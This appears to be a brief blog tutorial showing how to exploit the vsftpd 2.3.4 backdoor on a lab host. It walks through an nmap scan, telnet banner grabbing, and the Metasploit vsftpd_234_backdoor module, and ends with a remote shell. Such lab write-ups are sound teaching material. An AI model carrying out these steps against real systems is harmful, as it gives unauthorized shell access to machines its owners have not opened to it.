vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

 Identify the vulnerrable host and perform scanning on the vulnerable machine using nmap or any other faviourate scanning tool

nmap -p0-65535 192.168.2.129

Featured image

Here the interesting part in this machine is port 21, if we enumerate ftp service using telnet port on 21 we might some information.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPD installed on it and vsftpd 2.3.4 version is vulnerable and allows to execute the command at backdoor.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Name Current Setting Required Description
 ----------------------------------------------------------------------------------
 RHOST                     yes                 The target address
 RPORT      21           yes                  The target port

Exploit target:

 Id Name
 --   ----
 0 Automatic

set the RHOT and RPORT to exploit 

Featured image

Got the shell 🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s